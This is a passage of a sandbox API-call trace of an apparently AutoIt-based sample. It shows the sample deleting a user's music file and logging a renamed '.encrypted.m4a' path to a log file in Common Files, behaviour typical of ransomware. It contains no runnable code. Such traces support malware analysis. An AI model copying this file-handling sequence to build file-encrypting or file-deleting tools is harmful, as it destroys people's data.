wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.112] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0039.112] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0039.112] FreeLibrary (hLibModule=0x76b40000) returned 1 [0039.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0039.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0039.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0039.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0039.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0039.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0039.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0039.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0039.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0039.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0039.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0039.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0039.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0039.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0039.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0039.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0039.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0039.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0039.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0039.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0039.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0039.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0039.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0039.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.113] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.113] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.113] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.113] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0039.113] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.113] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.113] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.113] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.113] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.113] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.113] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.113] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.113] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.113] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.113] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.113] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.113] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.113] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.113] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.113] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.114] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0039.114] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.114] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zpoe-x9xwzebvppnc\\thua2jefihtofcp.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0039.114] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.114] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.114] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.114] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.114] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0039.114] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.114] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.114] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.115] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.115] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.115] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.115] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.115] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.115] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0039.115] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.115] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.115] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.115] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.115] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.115] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.115] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.116] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a", lpFilePart=0x0) returned 0x49 [0039.116] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ca4bcf0, ftCreationTime.dwHighDateTime=0x1d5bb71, ftLastAccessTime.dwLowDateTime=0x253ef3a0, ftLastAccessTime.dwHighDateTime=0x1d5c0d4, ftLastWriteTime.dwLowDateTime=0x17049ba0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xd484, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="tHua2JefIhtOfCp.m4a", cAlternateFileName="THUA2J~1.M4A")) returned 0x7c2100 [0039.116] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zpoe-x9xwzebvppnc\\thua2jefihtofcp.m4a")) returned 1 [0039.117] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ca4bcf0, ftCreationTime.dwHighDateTime=0x1d5bb71, ftLastAccessTime.dwLowDateTime=0x253ef3a0, ftLastAccessTime.dwHighDateTime=0x1d5c0d4, ftLastWriteTime.dwLowDateTime=0x17049ba0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xd484, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="tHua2JefIhtOfCp.m4a", cAlternateFileName="THUA2J~1.M4A")) returned 0 [0039.117] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0039.117] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.117] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0039.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0039.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0039.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0039.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0039.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0039.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0039.117] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0039.117] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0039.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0039.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.118] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0039.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.118] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0039.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0039.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.118] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0039.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0039.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0039.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0039.118] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0039.118] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0039.118] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.119] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0039.119] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.119] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0039.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0039.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0039.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.119] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0039.119] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x27f3, lpOverlapped=0x0) returned 1 [0039.119] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0039.119] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x27f3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.119] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0039.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0039.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.encrypted.m4a\r\n", cchWideChar=86, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 86 [0039.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x56) returned 0x794b90 [0039.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.encrypted.m4a\r\n", cchWideChar=86, lpMultiByteStr=0x794b90, cbMultiByte=86, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.encrypted.m4a\r\n", lpUsedDefaultChar=0x0) returned 86 [0039.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0039.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0039.119] WriteFile (in: hFile=0x140, lpBuffer=0x87a9d8*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87a9d8*, lpNumberOfBytesWritten=0x6aee3c*=0x55, lpOverlapped=0x0) returned 1 [0039.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0039.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.120] CloseHandle (hObject=0x140) returned 1 [0039.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0039.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0039.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0039.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0039.121] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0039.121] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8600 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0039.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.122] HeapFree (in: 